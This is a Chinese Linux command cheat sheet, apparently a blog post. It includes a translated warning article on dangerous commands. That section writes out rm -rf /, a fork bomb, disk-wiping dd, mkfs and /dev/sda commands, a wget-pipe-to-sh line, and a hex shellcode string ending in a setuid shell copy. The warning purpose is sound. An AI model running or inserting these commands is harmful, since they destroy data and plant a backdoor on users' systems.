1.!$是一个特殊的环境变量,它代表了上一个命令的最后一个字符串。如:你可能会这样:
$mkdir mydir $mv mydir yourdir $cd yourdir //可以改成: $mkdir mydir $mv !$ yourdir $cd !$ sudo !!
在ubuntu上面忘记了打sudo,就可以用sudo !!代替。在shell下,有时候你会输入很长的命令,你可以使用!xxx来重复最近的一次命令,比如,你以前输入过,vi temp.txt, 下次你可以使用 !vi 重得上次最近一次的vi命令。
2.cd – 回到上一次的目录 。
3.> file.txt 创建一个空文件,比touch短。
4.echo “ls -l” | at midnight 在某个时间运行某个命令
5.curl -u user:pass -d status=”Tweeting from the shell” http://twitter.com/statuses/update.xml
命令行的方式更新twitter。
6.curl -u username –silent “https://mail.google.com/mail/feed/atom” | perl -ne ‘print “\t” if /<name>/; print “$2\n” if /<(title|name)>(.*)<\/\1>/;’
检查你的gmail未读邮件
7.ps aux | sort -nk +4 | tail 列出头十个最耗内存的进程
8.man ascii 显示ascii码表。
9.netstat –tlnp 列出本机进程监听的端口号。(陈皓注:netstat -anop 可以显示侦听在这个端口号的进程)
10.ssh user@server bash < /path/to/local/script.sh
在远程机器上运行一段脚本。这条命令最大的好处就是不用把脚本拷到远程机器上。
11.ssh user@host cat /path/to/remotefile | diff /path/to/localfile -
比较一个远程文件和一个本地文件
12.net rpc shutdown -I ipAddressOfWindowsPC -U username%password 远程关闭一台Windows的机器
13.wget --random-wait -r -p -e robots=off -U mozilla http://www.example.com 下载整个www.example.com网站。
14.curl ifconfig.me 当你的机器在内网的时候,可以通过这个命令查看外网的IP。
15.vim scp://username@host//path/to/somefile vim一个远程文件
16.
python -m SimpleHTTPServer
一句话实现一个HTTP服务,把当前目录设为HTTP服务目录,可以通过http://localhost:8000访问 这也许是这个星球上最简单的HTTP服务器的实现了。
17. Ctrl+R 查找命令
18.在 bash里,使用 Ctrl-W 来删除最后一个单词,使用 Ctrl-U 来删除一行。
19.在bash 脚本中,subshells (写在圆括号里的) 是一个很方便的方式来组合一些命令。一个常用的例子是临时地到另一个目录中,例如:
# do something in current dir (cd /some/other/dir; other-command) # continue in original dir
20.学会到 /proc 目录中查看信息。这是一个Linux内核运行时记录的整个操作系统的运行统计和信息,比如:
/proc/cpuinfo, /proc/xxx/cwd, /proc/xxx/exe, /proc/xxx/fd/, /proc/xxx/smaps. top // 看内存状态 df -lh // 看硬盘状态
21. ubuntu的系统编码:
cat /etc/default/locale #LANG="en_IE.UTF-8" LANGUAGE="en_IE:en"
22.截取某时间段内的日志:
日志是这种格式:
172.18.1.8 172.16.205.108 - 200 682 3 [19/Oct/2017:17:35:35 +0800] 'POST /api/1.0.0 HTTP/1.1' - - 172.18.1.8 172.16.205.187 - 200 735 3 [19/Oct/2017:17:35:35 +0800] 'POST /api/1.0.0 HTTP/1.1' - - 172.18.1.6 172.16.205.108 - 200 220 2 [19/Oct/2017:17:35:35 +0800] 'POST /api/1.0.0 HTTP/1.1' - -
可用sed截取某时间段(17:35 - 17:55)内日志:
sed -n '/2017:17:35:34/,/2017:17:55:34/p' catalina.2017-10-19.log > catalina_20min.log
------------------------------以下常用命令-----------------------------
21.
grep -n "21089" schedule.log //-n显示行号 grep -lr '4131' * //只列出文件名 -r递归搜索子目录 -w正则匹配 grep "21089'$" schedule.log.1 //以21089'结尾的行。
22.
sed '1p' test.txt //-n只打印第一行,否则全部内容
sed -n '3,6p' test.txt //打印3-6行
'xp' //x为指定行号,x,y 指定范围
sed -n '/COMORG/p' test // /pattern/、/pattern/pattern/包含模式的行
// /pattern/,x、x,/pattern/ 之间的行
// x,y! 不包括x和y行的行 '1,3!p'
sed '/FORUMID/a\We append a new line.' test //在含FORUMID行后面追加一行
// i\前面。此时只是显示在Shell,test文件未变化
sed '/name="_version_"/d' select.xml > select0.xml //删除包含name="_version_"的行并输出到0.xml
sed -n 's/ va.*/ /p' test //替换以va开头的字符串
//example:
`DREDBNAME` varchar(50) DEFAULT NULL,
`CLICKCOUNT` int(11) DEFAULT NULL COMMENT '点击量',
`CHANNEL` varchar(50) DEFAULT NULL COMMENT '栏目频道',
// after sed
`DREDBNAME`
`CLICKCOUNT` int(11) DEFAULT NULL COMMENT '点击量',
`CHANNEL`
awk '{print $1}' test //直接显示第一个域
`DREDBNAME`
`CLICKCOUNT`
`CHANNEL`
#去掉标签 <b>This</b> is what <span style="text-decoration: underline;">I</span> meant. Understand? # 如果你这样搞的话,就会有问题 $ sed 's/<.*>//g' html.txt # 要解决上面的那个问题,就得像下面这样。 # 其中的'[^>]' 指定了除了>的字符重复0次或多次。 $ sed 's/<[^>]*>//g' html.txt This is what I meant. Understand?
23.
vi (){}^$ //移动光标
dd //删除整行
d$ //删除光标到结束
a //光标之后附加内容
A //整行后面附加内容
24.
awk '/^$/{print "Blank line."}' empty //匹配空行打印内容
awk 'BEGIN {FS=":"} $1~/root/' pwd //分隔符:,$1=root的行 !~表示不匹配
awk 'BEGIN {FS=":"} {if($3<=$4) print $0}' pwd //3<4则打印整行
25.
sed 's/tmp/UPDATE tasks/g' temp3.sql > temp4.sql //替换字符tmp为目标字符
sed 's/^/Head/g' temp3.sql > temp5.sql //添加到行首
sed 's/$/&TAIL/g' test.file //添加到行尾
sed 's/`//1' temp08-final.sql > temp09-update.sql #替换第一个匹配的字符
awk 'BEGIN{OFS=" "}{print $1,$2,$3,$4,$4 }' temp05.sql //指定输出域符号
基本命令:
http://linux.chinaitlab.com/special/linuxcom/
1.
cat /proc/version //查看内核、系统版本信息
cat /etc/issue # 查看操作系统版本
/proc/cpuinfo //查看CPU信息
sudo uname --m // 查看32位还是64位
top //查看CPU使用率
2.创建链接(快捷方式)
ln -s log2013.log link2013 //link2012是快捷方式名字
3.查找
sudo find / -name my.cnf
4.grep
从文件内容查找匹配指定字符串的行:
$ grep "被查找的字符串" 文件名
从文件内容查找与正则表达式匹配的行:
$ grep –e “正则表达式” 文件名
查找时不区分大小写:
$ grep –i "被查找的字符串" 文件名
查找匹配的行数:
$ grep -c "被查找的字符串" 文件名
从文件内容查找不匹配指定字符串的行:
$ grep –v "被查找的字符串" 文件名
grep "varchar" tempsql.sql >temp.sql #查找包含指定字符的行,并生成到文件 grep -E "varchar|CREATE" tempsql.sql >temp2.sql #正则匹配多个字符串
5.scp
scp #sourceFile #targetFile scp [email protected]:/tmp/aws-19012015.sql.gz ./aws-19012015.sql.gz //Copy remote file to local. scp spk.ear [email protected]:/home/ears/spk.ear //Copy local file to remote.
永远不要在Linux执行的10个最危险的命令
1.
rm -rf 命令
rm -rf命令是删除文件夹及其内容最快的方式之一。仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。下列是一些rm 命令的选项。
rm 命令在Linux下通常用来删除文件。
rm -r 命令递归的删除文件夹,甚至是空的文件夹。(译注:个人认为此处应该是说错了,从常识看,应该是“甚至是非空的文件夹”)
rm -f 命令能不经过询问直接删除‘只读文件’。(译注:Linux下删除文件并不在乎该文件是否是只读的,而只是在意其父目录是否有写权限。所以,-f这个参数只是表示不必一个个删除确认,而是一律悄悄删除。另外,原始的rm命令其实也是没有删除提示的,只是一般的发行版都会将rm通过别名的方式增加-i参数来要求删除确认,而-f则抑制了这个提示。)
rm -rf / : 强制删除根目录下所有东东。(就是说删除完毕后,什么也没有了。。。)
rm -rf *: 强制删除当前目录的所有文件。
rm -rf . : 强制删除当前文件夹及其子文件夹。
从现在起,当你要执行rm -rf命令时请留心一点。我们可以在“.bashrc”文件对‘rm‘命令创建rm -i的别名,来预防用 ‘rm‘命令删除文件时的事故,它会要求你确认每一个删除请求。(译注:大多数发行版已经这样做了,如果还没有,请这样做,并在使用-f参数前一定考虑好你在做什么!译者本人有着血泪的教训啊。)
2.
:(){:|:&};:
这就是个fork zha弹的实例。具体操作是通过定义一个名为 ‘:‘的函数,它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。
:(){:|:&};:
哦?你确认你要试试么?千万别在公司正式的服务器上实验啊~~
3. 命令
> /dev/sda
上列命令会将某个‘命令‘的输出写到块设备/dev/sda中。该操作会将在块设备中的所有数据块替换为命令写入的原始数据,从而导致整个块设备的数据丢失。
4.
mv 文件夹 /dev/null
这个命令会移动某个‘文件夹‘到/dev/null。在Linux中 /dev/null 或 null 设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。(译注:这就是黑洞啊。当然,要说明的是,通过将文件夹移动到黑洞,并不能阻止数据恢复软件的救赎,所以,真正的彻底毁灭,需要采用专用的软件或者手法来完成——我知道你肯定有些东西想删除得干干净净的。)
# mv /home/user/* /dev/null
上列命令会将User目录所有内容移动到/dev/null,这意味着所有东西都被‘卷入’黑洞 (null)之中。
5.
wget http://malicious_source -O- | sh
上列命令会从一个(也许是)恶意源下载一个脚本并执行。Wget命令会下载这个脚本,而sh会(无条件的)执行下载下来的脚本。
注意: 你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。(译注:所以,你真的知道你在做什么吗?当遇到这种需要是,我的做法是,先wget下来,然后我去读一读其中到底写了些什么,然后考虑是否执行。)
6.
mkfs.ext3 /dev/sda
上列命令会格式化块设备‘sda’,你无疑知道在执行上列命令后你的块设备(硬盘驱动器)会被格式化,崭新的!没有任何数据,直接让你的系统达到不可恢复的阶段。(译注:通常不会直接使用/dev/sda这样的设备,除非是作为raw设备使用,一般都需要将sda分成类似sda1、sda2这样的分区后才使用。当然,无论你使用sda还是sda1,这样对块设备或分区进行mkfs都是毁灭性的,上面的数据都会被蒸发了。)
7.
> file
上列命令常用来清空文件内容(译注:通常也用于记录命令输出。不过请在执行前,确认输出的文件是空的或者还不存在,否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了。另外,我想你可能真正想用的是“>>”,即累加新的输出到文件,而不是刷新那个文件。)。如果用上列执行时输入错误或无知的输入类似 “>xt.conf” 的命令会覆盖配置文件或其他任何的系统配置文件。
8.
^foo^bar
这个命令在我们十个鲜为人知的 Linux 命令 - Part 3中描述过,用来编辑先前运行的命令而无需重打整个命令。但当用foobar命令时如果你没有彻底检查改变原始命令的风险,这可能导致真正的麻烦。(译注:事实上,这种小技巧是译者认为的,少数史前时代遗留下来的无用而有害的“黑客”技巧。)
9.
dd if=/dev/random of=/dev/sda
上列命令会向块设备sda写入随机的垃圾文件从而擦出数据。当然!你的系统可能陷入混乱和不可恢复的状态。(译注:记得上面说过mv到黑洞并不能彻底删除数据么?那么这个命令就是给了你一个彻底删除的方法!当然为了保险起见,你可以覆写多次。)
10.
隐藏命令
下面的命令其实就是上面第一个命令 (rm -rf)。这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄。在终端里运行下面命令可能会擦除你的根分区。
这个命令表明通常真正的危险是隐藏的,不会被轻易的检测到。你必须时刻留心你在做什么结果会怎样。不要编译/运行从未知来源的代码。
char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;
注意: 不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令。如果你想测试它们,请在虚拟机上运行。任何不和谐或数据丢失,由于运行上面的命令导致你的系统崩溃,文章作者和Tecmint概不负责。(译注:译者和转载网站也不负责~!)
11.tar解压
tar -zxvf // -f:use archive file or device ARCHIVE, -z:gzip, x:extract files from an archive tar -cvf //压缩 -c:create a new archive,
12. 环境变量
/etc/environment #设置整个系统的环境,与登录用户无关 /etc/profile #设置所有用户的环境,与登录用户有关。
例:将Node的Linux Binaries包中的bin添加到环境变量
sudo vi /etc/profile export NODE_HOME=/opt/node export PATH=$PATH:$NODE_HOME/bin export NODE_PATH=$PATH:$NODE_HOME/lib/node_modules
将bin目录append到profile尾部
export NODE_HOME=/home/vince/soft/node/ export PATH=$PATH:$NODE_HOME/bin export NODE_PATH=$PATH:$NODE_HOME/lib/node_modules
使命令生效
source /etc/profile
Node的 Source Code 则需要编译
./configure --prefix=~/nodeTemp //检测你的安装平台的目标特征。比如它会检测你是不是有CC或GCC,并不是需要CC或GCC,它是个shell脚本。 // 不指定prefix,则可执行文件默认放在/usr/local/bin,库文件默认放在/usr/local/lib,配置文件默认放在/usr/local/etc。其它的资源文件放在/usr/local/share。 // 要卸载这个程序,要么在原来的make目录下用一次make uninstall(前提是make文件指定过uninstall),要么去上述目录里面把相关的文件一个个手工删掉。指定prefix,直接删掉一个文件夹就够了。 make //编译,它从Makefile中读取指令,然后编译。 make install //安装,它也从Makefile中读取指令,安装到指定的位置。